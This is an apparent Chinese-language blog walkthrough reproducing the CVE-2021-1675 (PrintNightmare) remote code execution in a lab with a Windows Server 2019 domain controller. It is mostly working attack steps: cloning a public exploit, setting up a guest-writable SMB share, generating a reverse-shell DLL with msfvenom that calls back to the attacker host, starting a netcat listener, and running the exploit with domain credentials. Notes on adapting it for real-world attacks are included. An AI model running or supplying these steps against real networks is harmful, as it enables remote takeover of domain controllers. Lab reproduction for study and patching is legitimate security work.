CVE-2021-1675远程RCE复现

前言

为了复现前几天爆出的CVE-2021-1675远程RCE,我的周末过得很充实,谨以此篇记录那个永远都回不来的周末。

测试环境

DC:Windows Server 2019 192.168.110.110

PC:Windows 10 192.168.110.120

Attack:Kali2020.3 192.168.110.132

在域控Windows Server 2019上创建普通域用户user1,使用user1登录域主机Windows 10确定可用

远程RCE复现

exp地址:https://github.com/cube0x0/CVE-2021-1675

git clone https://github.com/cube0x0/CVE-2021-1675.git

按照exp项目上smb上传后执行的方法,配置kali的smb配置文件/etc/samba/smb.conf:

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = nobody

启动smb

impacket-smbserver smb /tmp/

wKg0C2Diy7eAWHOGAABMBh4ryv4019.png

kali使用msf生成dll木马:

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.110.132 LPORT=7777 -f dll -o /tmp/sjbs.dll

并监听端口:

nc -lvvp 7777

运行exp:

python3 CVE-2021-1675.py hacker.test/win10:ShiJinBuShi@192.168.110.110 '\\192.168.110.132\smb\sjbs.dll'

wKg0C2DizDmAAX0RAABMhAWiw1E610.png

看到刚生成的dll木马成功上传到了域控服务器:

wKg0C2DizEOATnhdAACVqpT6mx4858.png

接收到shell:

wKg0C2DizFuAXXF3AABgxnZvPOg610.png

踩到的坑

域控服务器:最开始是使用的Windows Server 2012 R2,可惜不管什么姿势都无法成功。后来学长告诉我:

wKg0C2DizT6AS8WHAAAiD2dDxM088.png

Kali的smb服务:正常起smb服务后运行exp报错了

wKg0C2DizkyAMZCcAACHrZFzADk392.png

本地测试一下:

wKg0C2DizoOANsjqAABl72dctDU115.png

管理员权限powershell启用smb1后就好了:

Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

但是实战中我们不可能去域控上打开SMB1,所以只需要Windows开启smb,将dll文件放在Windows的共享目录并在运行exp时使用该地址即可。

本篇参考:

https://github.com/cube0x0/CVE-2021-1675/issues/19

查看原文